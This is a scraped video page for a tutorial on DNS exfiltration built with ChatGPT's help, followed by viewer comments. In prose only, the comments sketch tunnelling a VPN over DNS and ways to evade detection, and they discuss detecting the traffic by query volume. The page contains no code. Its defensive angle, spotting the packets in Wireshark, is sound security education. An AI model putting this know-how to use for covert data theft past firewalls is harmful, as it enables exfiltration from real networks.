DNS Exfiltration with ChatGPT
ฝัง
- เผยแพร่เมื่อ 5 ก.ย. 2024
- In this video we will be demonstrating what a DNS exfiltration attack is, and how easy they are to pull off using ChatGPT. We'll also cover how to spot these DNS packets in Wireshark. We'll cover three implementations of the attack with increasing complexity.
Disclaimer: this video is for educational purposes only.
Came here from comments of a later video about using ping for the same thing. Yep this is a great start. With enough motivation i think you could actually build a VPN over DNS. This should pass most firewalls and dns forwarders. You'd need to write a custom dns server but python's twisted framework has an example of this. You'd push data up in the query and be able to return heaps more data with many ipv6 ips in the response. In order to evade detection you might need a bunch of domain names with DNS servers on different networks. Your responses should have short TTLs jsut in case you get the same query twice. The only challenge i can see is that you would need to send multiple query DNS requests and these become fairly easy to spot. Most queries only ask for one record, so a network device might be able to signal there are lots of multiple query DNS requests. However the house would have well and truly bolted before anyone got wise to the fact you were exfiltrating data via DNS. Even longer before they realised you were running a VPN.
I think this is absolutely possible
@@plaintextpackets yes I did some more research and there are tools around that can do all sorts of stuff using properly formed DNS queries. So completely possible and it looks like the only way to stop it is by looking at the volume and rate of querying of DNS.
Woahhhhhhhhhhh imma build this for kalicraft
That’s it…no one is allowed to use DNS any more. Block all traffic on 53. Job done. Haha
Problem solved Lool
You cannot decript a MD5 hash it is a one way function. You want to encrypt it instead. But I get the idea very interesting video!
You're right! I just realized, should have asked it for a simple symmetric encryption.
Awesome video! I believe this technique is very prevalent out in the wild ..but i suppose this only works once you are inside the network. Could this be prevented by monitoring the amount of DNS query? Surely high end firewalls can detect an abnormal amount of that traffic, but like you said, i guess you could just set it up to send little bits at a time?
Yep it would work inside a network. A lot of corporations are challenged with keeping confidential information off of the public internet while still allowing access to users.
You are right you’d have to control the volume as volumetric increases in traffic can be easily spotted.
Imagine a messaging protocol that makes explicit use of DNS only to transmit messages in plain text in a secure way.
With a little development this is totally doable and likely already out in the wild today
Can you explain what you mean?